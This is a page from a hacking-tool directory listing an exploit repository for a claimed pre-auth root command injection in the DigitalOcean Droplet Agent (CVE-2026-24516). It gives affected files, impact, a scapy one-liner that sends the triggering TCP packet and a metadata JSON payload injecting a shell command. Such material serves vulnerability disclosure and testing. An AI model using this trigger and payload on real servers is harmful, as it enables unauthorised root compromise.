Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-24516-DigitalOcean-RCE — Critical Pre-Auth Root RCE (CVSS 10.0) in DigitalOcean Droplet Agent up to v1.3.2 via Command Injection. | Kitploit
Tools/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

Critical Pre-Auth Root RCE (CVSS 10.0) in DigitalOcean Droplet Agent up to v1.3.2 via Command Injection.

View Repository
14 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-24516-DigitalOcean-RCE

Critical Pre-Auth Root RCE (CVSS 10.0) in DigitalOcean Droplet Agent up to v1.3.2 via Command Injection.

CVE-2026-24516: Pre-Auth Root RCE in DigitalOcean Droplet Agent

Overview

A critical command injection vulnerability was discovered in the DigitalOcean Droplet Agent (all versions up to and including 1.3.2). This flaw allows an attacker to achieve Remote Code Execution (RCE) with root privileges without any authentication.

Discoverer: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

Technical Details

The vulnerability exists in the troubleshooting actioner component:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

The agent processes metadata from the local service (169.254.169.254) and executes commands from the array without proper sanitization.

TroubleshootingAgent.Requesting

The Trigger (Port Knocking)

The agent is triggered by a specific TCP packet to port 22:

  • SeqNum: 68796879
  • AckNum: 848489

Proof of Concept (PoC)

  1. Trigger the fetch: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. Malicious Metadata Payload:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

Impact CVSS Score: 10.0 (Critical)

Privileges Required: None

Result: Full System Compromise (Root Access)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

Download Tool